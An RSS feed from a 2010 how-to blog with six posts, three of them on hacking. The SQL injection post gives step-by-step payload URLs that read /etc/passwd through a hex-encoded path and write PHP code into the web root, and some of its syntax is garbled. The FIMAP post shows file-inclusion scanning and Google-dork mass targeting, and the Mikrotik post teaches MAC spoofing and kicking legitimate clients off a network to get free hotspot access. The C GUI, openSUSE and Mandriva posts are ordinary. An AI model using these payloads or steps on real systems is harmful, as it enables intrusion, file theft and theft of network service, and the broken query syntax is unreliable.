<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>All About How To</title>
	<atom:link href="http://www.toolshowto.com/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.toolshowto.com</link>
	<description>its all about how to make, how to install, how to use, how to find, how to remove, and all how-to&#039;s</description>
	<lastBuildDate>Sat, 19 Jun 2010 20:44:13 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Build A GUI With C Language in Linux (part I)</title>
		<link>http://www.toolshowto.com/?p=176</link>
		<comments>http://www.toolshowto.com/?p=176#comments</comments>
		<pubDate>Sat, 19 Jun 2010 20:44:13 +0000</pubDate>
		<dc:creator>biohazards</dc:creator>
				<category><![CDATA[Application/Software]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[application]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[gui]]></category>
		<category><![CDATA[language]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[open source]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://www.toolshowto.com/?p=176</guid>
		<description><![CDATA[Hi dude, We meet again, this time i&#8217;ll discuss about making a GUI with C. Altough you maybe already an expert of it&#8230;:p You know, Linux is an Operating System that work with C Language. And, because it is open-source, we can edit, modify, add, or even make any customization on the operating system. In [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://t1.gstatic.com/images?q=tbn:OUoZk9mSHZrl0M:http://aslibisnissukses.files.wordpress.com/2009/12/logo-opensource.jpg"><img class="alignleft" style="margin: 2px 4px;" title="http://t1.gstatic.com/images?q=tbn:OUoZk9mSHZrl0M:http://aslibisnissukses.files.wordpress.com/2009/12/logo-opensource.jpg" src="http://t1.gstatic.com/images?q=tbn:OUoZk9mSHZrl0M:http://aslibisnissukses.files.wordpress.com/2009/12/logo-opensource.jpg" alt="linux" width="92" height="150" /></a>Hi dude,<br />
We meet again, this time i&#8217;ll discuss about making a GUI with C. Altough you maybe already an expert of it&#8230;:p</p>
<p style="text-align: justify;">You know, Linux is an Operating System that work with C Language. And, because it is open-source, we can edit, modify, add, or even make any customization on the operating system. In this case, we try to make simple GUI using C.</p>
<p style="text-align: justify;"><span id="more-176"></span>I assumed, you already know the syntax of C. So, I would have to explain that. Now, let&#8217;s stop the crap and see this script :</p>
<blockquote style="text-align: justify;"><p><em># include &lt;gtk/gtk.h&gt;</p>
<p>static gint window_closed (GtkWidget* window, GdkEventAny* even,<br />
gpointer data);</p>
<p>int main (int argc, char *argv[])</p>
<p>{<br />
GtkWidget* window;<br />
GtkWidget* label;<br />
gtk_init (&amp;argc, &amp;argv);<br />
window = gtk_window_new (GTK_WINDOW_TOPLEVEL);<br />
gtk_window_set_title(GTK_WINDOW(window),&#8221;Did You Read Me??This is<br />
The Window Label&#8221;);<br />
label = gtk_label_new (&#8220;Did You Read Me??&#8221;/n&#8221;This is the message in<br />
the<br />
window&#8221;);<br />
gtk_signal_connect (GTK_CONTAINER<br />
(window),&#8221;delete_event&#8221;,GTK_SIGNAL_FUNC(window_closed),NULL);<br />
gtk_widget_show_all (window);<br />
gtk_main ();<br />
return 0;<br />
}</p>
<p>static gint window_closed(GtkWidget* window, GdkEventAny* even,<br />
gpointer data)<br />
{<br />
gtk_main_quit();<br />
return FALSE;<br />
}</em></p>
<blockquote>
<blockquote></blockquote>
</blockquote>
</blockquote>
<p>Then, let&#8217;s see the result. First, you have to save the script in to a c file. Let say, the file name is &#8220;gui.c&#8221;. Then, go to the shell prompt (terminal/konsole) and compile it with this command :</p>
<blockquote style="text-align: justify;"><p>~# gcc gui.c -o result_file &#8216;pkg-config &#8211;cflags &#8211;libs gtk+2.0&#8242;</p></blockquote>
<p>The &#8216;<em>pkg-config &#8211;cflags &#8211;libs gtk+2.0</em>&#8216; is important, because this mean, we compile the script with calling the GTK library.</p>
<p>Ok, its 3.00 AM now&#8230;time to sleep..We&#8217;ll continue the explanation of the script on my next post. So, stay tune guys&#8230;</p>
<blockquote style="text-align: justify;">
<blockquote>
<blockquote>
<p style="text-align: justify;">
</blockquote>
</blockquote>
</blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.toolshowto.com/?feed=rss2&amp;p=176</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQLi, Injecting With Outfile Command</title>
		<link>http://www.toolshowto.com/?p=173</link>
		<comments>http://www.toolshowto.com/?p=173#comments</comments>
		<pubDate>Fri, 11 Jun 2010 20:34:36 +0000</pubDate>
		<dc:creator>biohazards</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Web Security]]></category>
		<category><![CDATA[/etc/passwd/]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[command]]></category>
		<category><![CDATA[configuration]]></category>
		<category><![CDATA[inject]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[outfile]]></category>
		<category><![CDATA[passwd]]></category>
		<category><![CDATA[setting]]></category>
		<category><![CDATA[settings]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[sqli]]></category>
		<category><![CDATA[target]]></category>

		<guid isPermaLink="false">http://www.toolshowto.com/?p=173</guid>
		<description><![CDATA[Hi guys, long time no see&#8230;I&#8217;ve been busy to making a simple IDS (Intrusion Detection System) for now on. But, it still in progress. Although I&#8217;ve try very hard, it seems very difficult for me. Maybe next time i&#8217;ll post it here. Now, stop the crap, and lets go to the topic. Did you know, [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft" style="margin: 2px 4px;" title="hacker" src="http://t3.gstatic.com/images?q=tbn:VwEHwkElt1ynuM:http://siliconvalleysleuth.co.uk/photos/uncategorized/hacking.jpg" alt="" width="118" height="118" />Hi guys, long time no see&#8230;I&#8217;ve been busy to making a simple IDS (Intrusion Detection System) for now on. But, it still in progress. Although I&#8217;ve try very hard, it seems very difficult for me. Maybe next time i&#8217;ll post it here. Now, stop the crap, and lets go to the topic. Did you know, in the widespread use of websites, there was so many sites doesn&#8217;t protect their databse securely. In this post, I want to discuss about injecting with &#8220;outfile&#8221; command. This vulnerability could happend because the administrator doesn&#8217;t protect the database. He/They, maybe using the default setting of the SQL. So, to preventing this damage, let&#8217;s try how the attacker penetrating the target.<span id="more-173"></span></p>
<p style="text-align: justify;">I&#8217;ll skip the step when we seaching the hole. I&#8217;ll just jump into the steps where this penetration possibly happen. Here they are :</p>
<ul>
<li>after the target was located, let&#8217;s call it : &#8220;<strong>www.target.com/article.php?id=1</strong>&#8220;&#8230;and the hole was found at &#8220;<strong>www.target.com/article.php?id=1+AND+2=1+SELECT UNION+1,2,3&#8211;</strong>&#8220;&#8230;and the lucky number was found at &#8220;<strong>2</strong>&#8220;. we can just do the next step.</li>
<li>try to look what is the operating system of the server, we can use this command:<strong> </strong></li>
<p style="padding-left: 30px;"><strong>www.target.com/article.php?id=1+AND+2=1+SELECT UNION+1,version(),3&#8211; </strong><br />
this command will resulting an output, ex: <strong>5.0.2-log</strong> or <strong>5.0.2-ntfamily, </strong>the output with &#8220;<strong>log</strong>&#8221; means the server is using Linux and the &#8220;<strong>Nt</strong>&#8221; means the server using windows operating system.</p>
<p style="padding-left: 30px;"><strong>www.target.com/article.php?id=1+AND+2=1+SELECT  UNION+1,datadir(),3&#8211;</strong><br />
this command will resulting an output &#8220;<strong>/var/lib/mysql/</strong>&#8221; or &#8220;<strong>D:/http/bin/mysql/</strong>&#8220;&#8230;did you got that?? :p</p>
<li>Now, lets check the permission, the command is :</li>
</ul>
<p style="padding-left: 70px;"><strong>www.target.com/article.php?id=1+AND+2=1+SELECT  UNION+1,</strong><strong>file_priv,3 FROM mysql.user</strong><strong>,3&#8211;</strong></p>
<p style="padding-left: 70px;">this command should be showing an output &#8220;<strong>Y</strong>&#8220;, &#8220;<strong>N</strong>&#8220;, &#8220;<strong>error</strong>&#8220;, or nothing happend/blank output. The N and Error means that we can&#8217;t write using the current database user. But, the Y and blank output means we can to write (or exactly injecting to wrtie trough the SQL vulnerability).</p>
<ul>
<li>then, try to load a file that must be in the server, for linux  operating system, try &#8220;/etc/passwd&#8221; file, or in the Windows, try to load  &#8220;boot.ini&#8221; file. But first, you have to convert the complete file paht  into hex format. The command is :</li>
</ul>
<p style="padding-left: 70px;"><strong>www.target.com/article.php?id=1+AND+2=1+SELECT  UNION+1,loadfile(</strong><strong>0x2f6574632f706173737764</strong><strong>),3&#8211;</strong></p>
<ul>
<li>If the target has shown the result, all you havve to do is find the crucial files like &#8220;httpd.conf&#8221;, &#8220;apache.conf&#8221;, or any else. It is the hardest step, because we have to guessing where the file is</li>
<li>Let say you have found the file, you can analyse where is the path that you can write. Not just writing our command, but also copying the certain file. Try this command :</li>
</ul>
<p style="padding-left: 70px;"><strong>www.target.com/article.php?id=1+AND+2=1+SELECT   UNION+1,loadfile(</strong><strong>0x2f6574632f706173737764</strong><strong>),3</strong> <strong>INTO  OUTFILE ‘../../target/dir/file.php &#8211;</strong>&gt;&gt; to copy a specific  file</p>
<p style="padding-left: 70px;"><strong>www.target.com/article.php?id=1+AND+2=1+SELECT   UNION+1,&#8217;code&#8217;</strong><strong>,3</strong> <strong>INTO OUTFILE  ‘../../target/dir/file.php &#8211;</strong>&gt;&gt; to write a specific code  into a file</p>
<ul>
<li>So, if you could executing a harmfull php code to the target, why are you  should find the administrator page hardly???</li>
</ul>
<p>That&#8217;s it guys&#8230;Now, are you still using the default settings of SQL???</p>
<p>Just for refference, read <a title="SQLi outfile reffernce" href="http://milw0rm.com/papers/372" target="_blank">this article</a> closely&#8230;:p</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toolshowto.com/?feed=rss2&amp;p=173</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How To Use FIMAP</title>
		<link>http://www.toolshowto.com/?p=169</link>
		<comments>http://www.toolshowto.com/?p=169#comments</comments>
		<pubDate>Fri, 12 Feb 2010 19:38:22 +0000</pubDate>
		<dc:creator>biohazards</dc:creator>
				<category><![CDATA[Application/Software]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Web Security]]></category>
		<category><![CDATA[deface]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[fie inclusion]]></category>
		<category><![CDATA[file]]></category>
		<category><![CDATA[fimap]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[how to]]></category>
		<category><![CDATA[how to hack]]></category>
		<category><![CDATA[howto]]></category>
		<category><![CDATA[iman karim]]></category>
		<category><![CDATA[inclusion]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[penetration test]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[url path]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[website]]></category>

		<guid isPermaLink="false">http://www.toolshowto.com/?p=169</guid>
		<description><![CDATA[FIMAP is a simple and amazing tool that used to penetration testing. This tool has made by Iman Karim, this is just one of his project at google-code. He made this tool using python, so it&#8217;s very easy to using it for scanning any bug or vulnerability in a site. So, for more guide, let&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft" style="margin: 2px 6px;" title="fimap" src="http://code.google.com/p/fimap/logo?logo_id=1257793897" alt="" width="160" height="63" />FIMAP is a simple and amazing tool that used to penetration testing. This tool has made by<em> <strong>Iman Karim</strong></em>, this is just one of his project at google-code. He made this tool using python, so it&#8217;s very easy to using it for scanning any bug or vulnerability in a site. So, for more guide, let&#8217;s begin the show&#8230;</p>
<p style="text-align: justify;"><strong>1. Download the FIMAP<br />
</strong>You can download this tool <a title="fimap download" href="http://fimap.googlecode.com/files/fimap_alpha_v07.tar.gz" target="_blank">here</a> or <a title="fimap-page" href="http://code.google.com/p/fimap/" target="_blank">here</a>.<span id="more-169"></span></p>
<p style="text-align: justify;"><strong>2. Extract the compressed file<br />
</strong>to extract the downloaded file, use the &#8220;tar -xvf&#8221; command. So it will be like this :<br />
<span style="text-decoration: underline;">root@bt:~# tar -xvf fimap_alpha_v07.tar.gz</span></p>
<p style="text-align: justify;"><strong>3. Then go to the extracted directory<br />
</strong>Just write cd&#8230;I&#8217;m sure you&#8217;ve already knew it.</p>
<p style="text-align: justify;"><strong>4. Run the FIMAP<br />
</strong>To run this tool, you can type &#8220;./fimap.py&#8221; or &#8220;python fimap.py&#8221;</p>
<p style="text-align: justify;"><strong>5. The output must be a help page to use this tool</strong></p>
<p style="text-align: justify;"><strong>6. a. To scan a single page<br />
</strong>To scanning s single page, you have to input the target url path completely, examples :<br />
<span style="text-decoration: underline;">root@bt:fimap_alpha_v07#./fimap.py -s -u http://target.site/index.php?cat=main</span></p>
<p style="text-align: justify;">If there was a bug/vulnerability founded in the url, it will shown like this:<br />
<em>fimap v.07 by Iman Karim &#8211; Automatic LFI/RFI scanner and exploiter.<br />
SingleScan is testing URL: &#8216;http://target.site/index.php?cat=main&#8217;<br />
[OUT] Parsing URL &#8216;http://target.site/index.php?cat=main&#8217;&#8230;<br />
[INFO] Fiddling around with URL&#8230;<br />
[OUT] Possible file inclusion found! -&gt; &#8216;http://target.site/index.php?cat=a4EihiFP&#8217; with Parameter &#8216;cat&#8217;.<br />
[OUT] Identifying Vulnerability &#8216;http://target.site/index.php?cat=main&#8217; with Parameter &#8216;cat&#8217;&#8230;<br />
[INFO] Scriptpath received: &#8216;/www/target&#8217;<br />
[INFO] Trying NULL-Byte Poisoning to get rid of the suffix&#8230;<br />
[INFO] NULL-Byte Poisoning successfull!<br />
[INFO] Testing file &#8216;/etc/passwd&#8217;&#8230;<br />
[INFO] Testing file &#8216;/proc/self/environ&#8217;&#8230;<br />
[INFO] Skipping absolute file &#8216;php://input&#8217;.<br />
[INFO] Testing file &#8216;/var/log/apache2/access.log&#8217;&#8230;<br />
[INFO] Testing file &#8216;/var/log/apache/access.log&#8217;&#8230;<br />
[INFO] Testing file &#8216;/var/log/httpd/access.log&#8217;&#8230;<br />
[INFO] Testing file &#8216;/var/log/apache2/access_log&#8217;&#8230;<br />
[INFO] Testing file &#8216;/var/log/apache/access_log&#8217;&#8230;<br />
[INFO] Testing file &#8216;/var/log/httpd/access_log&#8217;&#8230;<br />
[INFO] Skipping remote file &#8216;http://www.phpbb.de/index.php&#8217;.<br />
[INFO] Skipping remote file &#8216;http://www.uni-bonn.de/Frauengeschichte/index.html&#8217;.<br />
[INFO] Skipping remote file &#8216;http://www.kah-bonn.de/index.htm?presse/winterthur.htm&#8217;.<br />
##################################################################<br />
#[1] Possible File Injection                                     #<br />
##################################################################<br />
#  [URL]      http://target.site/index.php?cat=main       #<br />
#  [PARAM]    cat                                                #<br />
#  [PATH]     /www/target                                         #<br />
#  [TYPE]     Relative with appendix &#8216;.php&#8217;                      #<br />
#  [NULLBYTE] Works. <img src='http://www.toolshowto.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />                                           #<br />
#  [READABLE FILES]                                              #<br />
#                   [0] /etc/passwd -&gt; ../../../etc/passwd%00    #<br />
##################################################################<br />
</em></p>
<p style="text-align: justify;"><strong>b. To scan the multiple pages at once<br />
</strong>First, you have to make the list of the target. For the example, I&#8217;ve made the list and I saved the file wich named &#8220;targetlist.txt&#8221; and I save this file at /tmp directory. Then, I can execute the command with this command :<br />
<span style="text-decoration: underline;"> root@bt:fimap_alpha_v07#./fimap.py -m -l &#8216;/tmp/targetlist.txt&#8217;</span></p>
<p style="text-align: justify;"><strong>c. Use google to search any File Inclusion errors<br />
</strong>Since we knew that file inclusion sometimes could be found in any include function at the php syntax, we can search for it with any file that usually used by the web-maker. You can use this command :<br />
<span style="text-decoration: underline;">root@bt:fimap_alpha_v07#./fimap.py -g -q &#8216;inurl:php?cat= site:.com</span>&#8216;<br />
And so many more function or feature in this tool, all you have to do is explore it by yourself. But, please don&#8217;t use this tool to penetrating and cracking someone website.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toolshowto.com/?feed=rss2&amp;p=169</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bypassing Mikrotik Access Point Login</title>
		<link>http://www.toolshowto.com/?p=162</link>
		<comments>http://www.toolshowto.com/?p=162#comments</comments>
		<pubDate>Mon, 01 Feb 2010 19:04:54 +0000</pubDate>
		<dc:creator>biohazards</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[access point]]></category>
		<category><![CDATA[accounting]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[administrator]]></category>
		<category><![CDATA[authentification]]></category>
		<category><![CDATA[authorization]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[client]]></category>
		<category><![CDATA[customer]]></category>
		<category><![CDATA[hotspot]]></category>
		<category><![CDATA[how to]]></category>
		<category><![CDATA[how to hack]]></category>
		<category><![CDATA[howto]]></category>
		<category><![CDATA[ip address]]></category>
		<category><![CDATA[log in]]></category>
		<category><![CDATA[login]]></category>
		<category><![CDATA[mac address]]></category>
		<category><![CDATA[methode]]></category>
		<category><![CDATA[mikrotik]]></category>
		<category><![CDATA[netcut]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[wireshark]]></category>

		<guid isPermaLink="false">http://www.toolshowto.com/?p=162</guid>
		<description><![CDATA[Hi there, I want to start with a simple question here&#8230;&#8217;How secure was your Hotspot Area?&#8216;..In some case, there&#8217;s a bored thing when we got an access point with a login form. Why we should fill this form if we could passing away??And the second question is &#8216;How to bypass this mikrotik security?&#8216; So, let&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hi there,<a href="http://www.dmasoftlab.com/cont/images/mt-hotspot.gif"><img class="alignright" style="margin: 2px 6px;" title="mikrotik_login" src="http://www.dmasoftlab.com/cont/images/mt-hotspot.gif" alt="" width="240" height="235" /></a></p>
<p style="text-align: justify;">I want to start with a simple question here&#8230;&#8217;<em>How secure was your Hotspot Area?</em>&#8216;..In some case, there&#8217;s a bored thing when we got an access point with a login form. Why we should fill this form if we could passing away??And the second question is &#8216;<em>How to bypass this mikrotik security?</em>&#8216;</p>
<p style="text-align: justify;">So, let&#8217;s begin :<span id="more-162"></span></p>
<ol style="text-align: justify;">
<li>Let&#8217;s recognize what metode that used :<br />
This is an important step, except you&#8217;ve already knew what security methode that has used by the administrator. If the administrator using the <strong>Aunthentification</strong> method, all you have to do is :</p>
<ul>
<li>Get connected to the network</li>
<li>Make sure you got the<strong> IP address</strong> and the <strong>DNS address</strong></li>
<li>Run the &#8220;<a title="download" href="http://www.toolshowto.com/?page_id=5" target="_blank">NetCut</a>&#8221; tool (For win***s), or &#8220;<a title="download" href="http://www.toolshowto.com/?page_id=5" target="_blank">wireshark</a> (for linux&#8221; then scan your entire network.</li>
<li>Look at the clients that already connected to the network. Copy the <strong>MAC address</strong> to your MAC address.</li>
<li>Restart the network, and then re-connect to the network</li>
<li>&#8230;that&#8217;s it..!!! You got it man&#8230;</li>
</ul>
</li>
<li>If the administrator using the<strong> Authorization</strong> method, all you have to do is :
<ul>
<li>Try to follow the first step method. If you still can&#8217;t browsing, use the wireshark to listening any communication around the network. You can try change your <strong>MAC address</strong> to the connected client <strong>MAC address</strong> before connecting the network, or you can try to edit the <strong>IP address</strong> configuration manually, including the <strong>DNS</strong> configuration.</li>
<li>If still doesn&#8217;t works. Try to disconnect the already connected client that you&#8217;ve copied the <strong>MAC address</strong>.</li>
<li>Still doesn&#8217;t work??wow..the admin must be an expert !!!</li>
</ul>
</li>
<li>If the admin using<strong> Accounting</strong> method, all you have to do is :
<ul>
<li>Try the first step. Then run the wireshark</li>
<li>Classified the client IP&#8217;s (in case the admin made a different class for each client, usually in Accounting method, there is a <strong>VIP customer</strong>)</li>
<li>Try to change your MAC address to each client class. This step is used to attemp we could have a VIP customer facility.</li>
</ul>
</li>
</ol>
<p style="text-align: justify;">So, that&#8217;s all folks&#8230;Hope you can try this out..</p>
<p style="text-align: justify;">If you are administrator, you have to patch this. You can read the how to at <a href="http://whitesecure.com" target="_blank">http://whitesecure.com</a>.</p>
<p style="text-align: justify;"> <img src='http://www.toolshowto.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> ..:D..</p>
<p style="text-align: justify;">
]]></content:encoded>
			<wfw:commentRss>http://www.toolshowto.com/?feed=rss2&amp;p=162</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Remastering openSuSE is Easy</title>
		<link>http://www.toolshowto.com/?p=143</link>
		<comments>http://www.toolshowto.com/?p=143#comments</comments>
		<pubDate>Thu, 07 Jan 2010 10:05:46 +0000</pubDate>
		<dc:creator>biohazards</dc:creator>
				<category><![CDATA[Operation System]]></category>
		<category><![CDATA[open suse]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[rebuild]]></category>
		<category><![CDATA[remaster]]></category>
		<category><![CDATA[source]]></category>

		<guid isPermaLink="false">http://www.toolshowto.com/?p=143</guid>
		<description><![CDATA[hi guys, Let&#8217;s talk about &#8216;remaster&#8217;, what is it? With a simple words we can say, &#8216;remaster&#8217; is how we can build our own Operating System that reflecting ourself. However, in this case, &#8216;remaster&#8217;-ing is when we modifying an Operating System to be what we want to. That will be including changing the themes, applications, [...]]]></description>
			<content:encoded><![CDATA[<p>hi guys,</p>
<p>Let&#8217;s talk about &#8216;remaster&#8217;, what is it? With a simple words we can say, &#8216;remaster&#8217; is how we can build our own Operating System that reflecting ourself. However, in this case, &#8216;remaster&#8217;-ing is when we modifying an Operating System to be what we want to. That will be including changing the themes, applications, or anything else. So, let&#8217;s get in on&#8230;</p>
<p>Before beginning to remaster something, we have to preparing the list of application that have to be installed, the image for backgroud, themes, logo, and everything&#8230;If we got that, remastering will be just finish in an hour. Incredible isn&#8217;t it?<span id="more-143"></span></p>
<p>Now, I&#8217;m using openSuSE 11.2. Actually, we can do the &#8216;remastering&#8217; thing directly on our computer. But, i found this &#8220;incredible&#8221; site. The site that allow us to &#8216;remastering&#8217; an Novell Operating System. All we have to do is register to the site, then follow the steps. It is &#8220;<a class="aligncenter" title="build your own operating system" href="http://susestudio.com" target="_blank">susestudio.com</a>&#8221; , the site that providing us to remaster/rebuild the Novell Operating System. This site use &#8220;kiwi&#8221; as the back-ends. I assume u have no problem to the register and signing in. Now let&#8217;s follow the steps.</p>
<p>1. Choose what template of remaster do you want, here I choose &#8220;gnome&#8221; template.</p>
<p>2. Create the name of your own Operating System</p>
<p>3. Go to the &#8220;Software&#8221; tab, here you can add or remove any package or pattern. And in case u need to upload any rpm file or add the another repository. A little tips, you should know what application do you need according the list had you made before.</p>
<p>4. When done with add/removing application. go to the &#8220;Configuration&#8221; tab. Here you can configure any necessary configuration, like keyboard lay-out, language, artwork, and everything else. In the &#8220;Personalize&#8221; sub menu, you can upload your own logo&#8217;s and background image.</p>
<p>5. After that, you can just go to the build tab to build the Operating System.</p>
<p>So, it&#8217;s pretty easy isn&#8217;t it?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toolshowto.com/?feed=rss2&amp;p=143</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Modify Mandriva Bootsplash</title>
		<link>http://www.toolshowto.com/?p=135</link>
		<comments>http://www.toolshowto.com/?p=135#comments</comments>
		<pubDate>Wed, 02 Dec 2009 04:33:38 +0000</pubDate>
		<dc:creator>biohazards</dc:creator>
				<category><![CDATA[Operation System]]></category>
		<category><![CDATA[boot]]></category>
		<category><![CDATA[bootloader]]></category>
		<category><![CDATA[bootsplash]]></category>
		<category><![CDATA[cpio]]></category>
		<category><![CDATA[gfxmenu]]></category>
		<category><![CDATA[grub]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[mandriva]]></category>
		<category><![CDATA[menu.lst]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://www.toolshowto.com/?p=135</guid>
		<description><![CDATA[When your Mandriva booting with grub loader, there is a nice background picture on it. But, maybe we not always comfortable with that picture. As a simple human being, is a normal situation when we not satisfied with something that was not going like what we want (actually, we never satisfied about everything). So, in [...]]]></description>
			<content:encoded><![CDATA[<p>When your <em>Mandriva</em> booting with grub loader, there is a nice background picture on it. But, maybe we not always comfortable with that picture. As a simple human being, is a normal situation when we not satisfied with something that was not going like what we want (actually, we never satisfied about everything).<br />
So, in this post, I try to share to you how to edit that &#8220;<em>boot-splash</em>&#8220;. At the first time, I did a little bit confuse. Because in <em>Mandriva</em>, is more complex than <em>bootsplash</em> on <em>Ubuntu</em>. In <em>Ubuntu</em> we just can edit the &#8220;<strong>/boot/grub/menu.lst</strong>&#8221; file, and add this command :<br />
<strong><br />
splashimage (hd0,x)/boot/image_file.so</strong></p>
<p>But in <strong>Mandriva</strong> there is steps to change, so lets get in on&#8230;</p>
<p><span id="more-135"></span></p>
<p>1. First find and back-up your &#8220;<strong>gfxmenu</strong>&#8221; file, because on Mandriva, this is the file that contain the picture that we want to modify. This file shoul be at <strong>&#8220;/boot&#8221;</strong> directory.<br />
2. Enter to the terminal, and get in to your <strong>back-up</strong> &#8220;gfxmenu&#8221; file.<br />
3. Then, extract that file with this command :</p>
<p><strong> ~# cpio -i &lt; gfxmenu</strong></p>
<p>4. After that, get in to that extracted folder and found the &#8220;<strong>back.jpg</strong>&#8221; file. This is the file that we will to change.</p>
<p>5. Edit your own background with<strong> 256 color</strong> and <strong>8 bits</strong> depth (you can use GIMP to do this). And don&#8217;t forget to makesure the image size is <strong>600&#215;480 px</strong> or <strong>800&#215;600 px</strong>.</p>
<p>6. Save that picture with name &#8220;<strong>back.jpg</strong>&#8220;, then replace it in to the &#8220;<strong>gfxmenu</strong>&#8221; extracted folder.</p>
<p>7. Re-compress those files with this command :</p>
<p><strong>~# ls | cpio -o &gt; gfxmenu</strong></p>
<p>8. Copy the &#8216;<strong>gfxmenu&#8217;</strong> to the original location: <strong>/boot/</strong></p>
<p>7. <strong>Reboot</strong> your PC/Laptop to see the change</p>
<p>And, that&#8217;s it !!! We had change the bootloader image&#8230;</p>
<p>Everything gonna be easy with open-source&#8230;&#8230;&#8230;&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toolshowto.com/?feed=rss2&amp;p=135</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
